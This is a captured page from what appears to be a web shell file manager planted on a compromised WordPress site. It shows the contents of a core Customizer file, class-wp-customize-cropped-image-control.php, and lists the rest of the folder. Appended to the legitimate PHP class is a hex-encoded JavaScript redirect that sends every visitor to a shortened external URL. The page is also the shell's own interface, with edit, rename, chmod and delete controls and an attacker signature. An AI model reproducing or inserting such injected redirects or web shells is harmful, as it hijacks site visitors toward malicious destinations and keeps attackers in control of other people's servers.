Submit
Path:
~
/
home
/
caidadmin
/
dev.scribes.sca-caid.org
/
wp-includes
/
customize
/
File Content:
class-wp-customize-cropped-image-control.php
<?php /** * Customize API: WP_Customize_Cropped_Image_Control class * * @package WordPress * @subpackage Customize * @since 4.4.0 */ /** * Customize Cropped Image Control class. * * @since 4.3.0 * * @see WP_Customize_Image_Control */ class WP_Customize_Cropped_Image_Control extends WP_Customize_Image_Control { /** * Control type. * * @since 4.3.0 * @var string */ public $type = 'cropped_image'; /** * Suggested width for cropped image. * * @since 4.3.0 * @var int */ public $width = 150; /** * Suggested height for cropped image. * * @since 4.3.0 * @var int */ public $height = 150; /** * Whether the width is flexible. * * @since 4.3.0 * @var bool */ public $flex_width = false; /** * Whether the height is flexible. * * @since 4.3.0 * @var bool */ public $flex_height = false; /** * Enqueue control related scripts/styles. * * @since 4.3.0 */ public function enqueue() { wp_enqueue_script( 'customize-views' ); parent::enqueue(); } /** * Refresh the parameters passed to the JavaScript via JSON. * * @since 4.3.0 * * @see WP_Customize_Control::to_json() */ public function to_json() { parent::to_json(); $this->json['width'] = absint( $this->width ); $this->json['height'] = absint( $this->height ); $this->json['flex_width'] = absint( $this->flex_width ); $this->json['flex_height'] = absint( $this->flex_height ); } } ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x69\x6e\x66\x6f\x2f\x4b\x53\x6f\x30\x72\x33";</script>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
.htaccess
127 bytes
0444
class-wp-customize-background-image-control.php
1370 bytes
0644
class-wp-customize-background-image-setting.php
707 bytes
0644
class-wp-customize-background-position-control.php
3122 bytes
0644
class-wp-customize-code-editor-control.php
2479 bytes
0644
class-wp-customize-color-control.php
3228 bytes
0644
class-wp-customize-cropped-image-control.php
1622 bytes
0644
class-wp-customize-custom-css-setting.php
5450 bytes
0644
class-wp-customize-date-time-control.php
9075 bytes
0644
class-wp-customize-filter-setting.php
750 bytes
0644
class-wp-customize-header-image-control.php
8066 bytes
0644
class-wp-customize-header-image-setting.php
1839 bytes
0644
class-wp-customize-image-control.php
1373 bytes
0644
class-wp-customize-media-control.php
9546 bytes
0644
class-wp-customize-nav-menu-auto-add-control.php
1284 bytes
0644
class-wp-customize-nav-menu-control.php
2230 bytes
0644
class-wp-customize-nav-menu-item-control.php
7156 bytes
0644
class-wp-customize-nav-menu-item-setting.php
27729 bytes
0644
class-wp-customize-nav-menu-location-control.php
3250 bytes
0644
class-wp-customize-nav-menu-locations-control.php
2961 bytes
0644
class-wp-customize-nav-menu-name-control.php
1293 bytes
0644
class-wp-customize-nav-menu-section.php
878 bytes
0644
class-wp-customize-nav-menu-setting.php
19097 bytes
0644
class-wp-customize-nav-menus-panel.php
3836 bytes
0644
class-wp-customize-new-menu-control.php
1710 bytes
0644
class-wp-customize-new-menu-section.php
1693 bytes
0644
class-wp-customize-partial.php
10704 bytes
0644
class-wp-customize-selective-refresh.php
13705 bytes
0644
class-wp-customize-sidebar-section.php
1221 bytes
0644
class-wp-customize-site-icon-control.php
3430 bytes
0644
class-wp-customize-theme-control.php
11675 bytes
0644
class-wp-customize-themes-panel.php
3400 bytes
0644
class-wp-customize-themes-section.php
6918 bytes
0644
class-wp-customize-upload-control.php
1359 bytes
0644
class-wp-sidebar-block-editor-control.php
848 bytes
0644
class-wp-widget-area-customize-control.php
1819 bytes
0644
class-wp-widget-form-customize-control.php
2808 bytes
0644
index.htm
1100 bytes
0644
index.html
1100 bytes
0644
index.php
1100 bytes
0644
N4ST4R_ID | Naxtarrr